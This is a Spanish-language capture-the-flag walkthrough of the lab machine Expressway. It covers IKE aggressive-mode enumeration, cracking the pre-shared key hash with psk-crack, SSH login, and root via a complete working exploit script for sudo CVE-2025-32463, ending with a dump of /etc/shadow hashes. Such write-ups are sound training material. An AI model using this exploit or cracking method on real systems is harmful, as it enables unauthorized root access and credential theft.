Expressway inicia con la enumeracion de IPsec/Ike donde obtuvimos el valor de pre-shared Key hash que nos permitio el acceso por SSH. Escalamos privilegios tras explotar una version vulnerable de sudo.
| Nombre |
Expressway |
| OS |
Linux  |
| Puntos |
20 |
| Dificultad |
Easy |
| Fecha de Salida |
2025-09-20 |
| IP |
10.10.11.87 |
| Maker |
dakkmaddy |
|
Rated
|
{
"type": "bar",
"data": {
"labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
"datasets": [{
"label": "User Rated Difficulty",
"data": [651, 505, 1072, 353, 132, 47, 31, 4, 3, 29],
"backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
}]
},
"options": {
"scales": {
"xAxes": [{"display": false}],
"yAxes": [{"display": false}]
},
"legend": {"labels": {"fontColor": "white"}},
"responsive": true
}
}
|
Recon
nmap & rustscan
nmap muestra un unico puerto abierto port TCP: ssh (22).
1
2
3
4
5
6
7
8
9
10
|
# Nmap 7.95 scan initiated Sat Sep 20 15:51:20 2025 as: /usr/lib/nmap/nmap --privileged -p22 -sV -sC -oN nmap_scan 10.10.11.87
Nmap scan report for 10.10.11.87
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 20 15:51:30 2025 -- 1 IP address (1 host up) scanned in 10.50 seconds
|
rustscan muestra que el puerto 500 udp esta abierto.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
❯ ./rustscan -r 1-65535 --udp -a 10.10.11.87 -u 10000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.11.87:500
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 16:55 CST
Initiating Ping Scan at 16:55
Scanning 10.10.11.87 [4 ports]
Completed Ping Scan at 16:55, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:55
Completed Parallel DNS resolution of 1 host. at 16:55, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:55
Scanning 10.10.11.87 [1 port]
Completed SYN Stealth Scan at 16:55, 0.11s elapsed (1 total ports)
Nmap scan report for 10.10.11.87
Host is up, received reset ttl 63 (0.088s latency).
Scanned at 2025-09-20 16:55:43 CST for 0s
PORT STATE SERVICE REASON
500/tcp closed isakmp reset ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (80B)
❯
|
IPsec/IKE
A tra ves del puerto 500 udp se establecen conjutos de protocolos de red para conexiones seguras. Ejecutamos ike-scan, este muestra el uso de encriptacion 3DES, Hash SHA1, DH Group modp1024 y tipo de autenticacion PSK (Pre-shared Key). Tambien se muestra ikev2 pero no es ‘aceptado’.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
❯ ike-scan -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=d627b26401e24585)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.096 seconds (10.41 hosts/sec). 1 returned handshake; 0 returned notify
❯ ike-scan -M 10.10.11.87 --ikev2
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Notify message 14 (NO_PROPOSAL_CHOSEN)
HDR=(CKY-R=ba006e2e43afb30f, IKEv2)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.093 seconds (10.74 hosts/sec). 0 returned handshake; 1 returned notify
❯
|
El modo agresivo esta permitido (-A), esto nos permitiria obtener Pre-shared Key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
❯ sudo ike-scan -A -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=a53afe4a993fef37)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.095 seconds (10.54 hosts/sec). 1 returned handshake; 0 returned notify
❯
|
Cracking The Hash
ike-scan en modo agresivo especificamos el archivo para guardar el hash (-Phash).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
❯ sudo ike-scan -M -A -Phash 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=9d1d2ce903a459fd)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.5: 1 hosts scanned in 0.101 seconds (9.89 hosts/sec). 1 returned handshake; 0 returned notify
❯ cat hash
684b5036eca84e202c66e0b53e0994fce79129c9db92ec8747a7aef9905d697316f4c9845842b8e050dd0ac42aeb7c7df0e48c76690252656814f145270479e7bf29da0ffe7fe6fe5316dda810aa242f77f079341e8f2b00760439e46bbed4138131c8998f51f4a9a25710d0288e182da483ffa0a32f74ded8bf03638894c2d4:66494dec0cdc6717490975a566cb4118ef538cb77ea483c27f13b2ab211c6edbad69c5a384f78f49d71d37d3984a3800da96defa36cc5ba0e65e3aa4d4d76aa521a85881bbd073e341fb11c1526af8c387c1e7feb735330e8a523bcfb559baa728ed966df1da117c2ad23b28e28cba21d046b17de8b35cde23730b9153b75c3a:9d1d2ce903a459fd:754adfbe1afa5d70:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:1ade14bf7a94ba776c1e4cd5f76cfa24043b606a:39c8912310594124f8fe0fca2a8759abce239956a7ccfa45200f2f00f9f809ea:e5a58bfc2a44549de5ad339186332a7c35d06b41
❯
|
Con psk-crack especificamos el hash y el wordlist. Este nos devolvio el valor.
1
2
3
4
5
6
7
8
|
❯ sudo psk-crack hash -d /usr/share/wordlists/rockyou.txt -v
[sudo] password for sckull:
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Loaded 1 PSK entries from hash
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 09ba9f5a7d9c6de00d659f0fb516c1acfea9fbcb
Ending psk-crack: 8045040 iterations in 4.414 seconds (1822536.77 iterations/sec)
❯
|
User - Ike
Utilizamos ike como usuario por SSH con la contrasena previa. Logramos la lectura de la flag user.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
❯ ssh ike@10.10.11.87
ike@10.10.11.87's password:
Last login: Wed Sep 17 10:26:26 BST 2025 from 10.10.14.77 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 21 22:48:44 2025 from 10.10.14.8
ike@expressway:~$ whoami;id;pwd
ike
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
/home/ike
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
3d98e02d13edd20530c2aa2cf7f32dbb
ike@expressway:~$
|
Localmente encontramos el puerto 25 a la escucha.
1
2
3
4
5
6
7
8
9
|
ike@expressway:/dev/shm$ netstat -ntpl
(No info could be read for "-p": geteuid()=1001 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
ike@expressway:/dev/shm$
|
Observamos que al realizar una conexion a este puerto muestra Exim 4.98.2. La version mas cercana vulnerable es 4.98 (CVE-2025-26794).
1
2
3
4
5
6
|
ike@expressway:/dev/shm$ nc 127.0.0.1 25
123
220 expressway.htb ESMTP Exim 4.98.2 Sun, 21 Sep 2025 22:55:50 +0100
500 unrecognized command
^C
ike@expressway:/dev/shm$
|
Sudo
Enumeramos los ficheros con permisos suid. Se listan dos ejecutables sudo.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
ike@expressway:~$ find / -perm -4000 2>/dev/null | xargs ls -lah
-rwsr-xr-x 1 root root 70K Aug 26 22:05 /usr/bin/chfn
-rwsr-xr-x 1 root root 52K Aug 26 22:05 /usr/bin/chsh
-rwsr-xr-x 1 root root 87K Aug 26 22:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 75K Sep 9 10:09 /usr/bin/mount
-rwsr-xr-x 1 root root 19K Sep 9 10:09 /usr/bin/newgrp
-rwsr-xr-x 1 root root 116K Aug 26 22:05 /usr/bin/passwd
-rwsr-xr-x 1 root root 91K Sep 9 10:09 /usr/bin/su
-rwsr-xr-x 1 root root 276K Jun 27 2023 /usr/bin/sudo
-rwsr-xr-x 1 root root 63K Sep 9 10:09 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51K Mar 8 2025 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 483K Aug 10 00:07 /usr/lib/openssh/ssh-keysign
-r-sr-xr-x 1 root root 14K Aug 28 09:04 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 15K Aug 28 09:04 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo
-rwsr-xr-x 1 root root 1.5M Aug 14 12:58 /usr/sbin/exim4
ike@expressway:~$
|
Se muestra la version 1.9.17 y 1.9.13p. La version que esta siendo usada es la primera.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
ike@expressway:/dev/shm$ /usr/local/bin/sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:/dev/shm$ /usr/bin/sudo --version
Sudo version 1.9.13p3
Sudoers policy plugin version 1.9.13p3
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.13p3
Sudoers audit plugin version 1.9.13p3
ike@expressway:/dev/shm$ which sudo
/usr/local/bin/sudo
ike@expressway:/dev/shm$
|
CVE-2025-32463
Esta ultima esta en el rango de versiones vulnerables a CVE-2025-32463. El PoC crea un archivo de configuracion y libreria, con la ejecucion de --chroot este ejecuta codigo permitiendo escalar privilegios.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
|
Tras ejecutar el PoC en la maquina logramos acceso root y la lectura de root.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
ike@expressway:/dev/shm$ nano CVE-2025-32463.sh
ike@expressway:/dev/shm$ chmod +x CVE-2025-32463.sh
ike@expressway:/dev/shm$ ./CVE-2025-32463.sh
woot!
root@expressway:/# whoami
root
root@expressway:/# cd
root@expressway:~# ls
user.txt
root@expressway:~# cd /root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
0955ccefbe1143ffe0d2afef91e1eaaf
root@expressway:/root#
|
Dump Hashes
Realizamos la lectura del archivo /etc/shadow.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
root@expressway:/root# cat /etc/shadow
root:$y$j9T$u0cgimzO/m87OQdCkETl10$mTZSmVXBn10OJT7qVqvlEr7OwC0QppltyX33WH1esn7:20229:0:99999:7:::
daemon:*:20076:0:99999:7:::
bin:*:20076:0:99999:7:::
sys:*:20076:0:99999:7:::
sync:*:20076:0:99999:7:::
games:*:20076:0:99999:7:::
man:*:20076:0:99999:7:::
lp:*:20076:0:99999:7:::
mail:*:20076:0:99999:7:::
news:*:20076:0:99999:7:::
uucp:*:20076:0:99999:7:::
proxy:*:20076:0:99999:7:::
www-data:*:20076:0:99999:7:::
backup:*:20076:0:99999:7:::
list:*:20076:0:99999:7:::
irc:*:20076:0:99999:7:::
_apt:*:20076:0:99999:7:::
nobody:*:20076:0:99999:7:::
systemd-network:!*:20076::::::
systemd-timesync:!*:20077::::::
messagebus:!:20077::::::
sshd:!:20077::::::
strongswan:!:20162::::::
tcpdump:!:20171::::::
ike:$y$j9T$iACv1qBHXsR1j0yqIsVwY.$udBwggnZtUPt/0TNMIhsU4TDrQm2tCzTr6xUE0ilPQ4:20292:0:99999:7:::
mysql:!:20269::::::
tftp:!:20314::::::
Debian-exim:!:20329::::::
_laurel:!:20329::::::
root@expressway:/root#
|
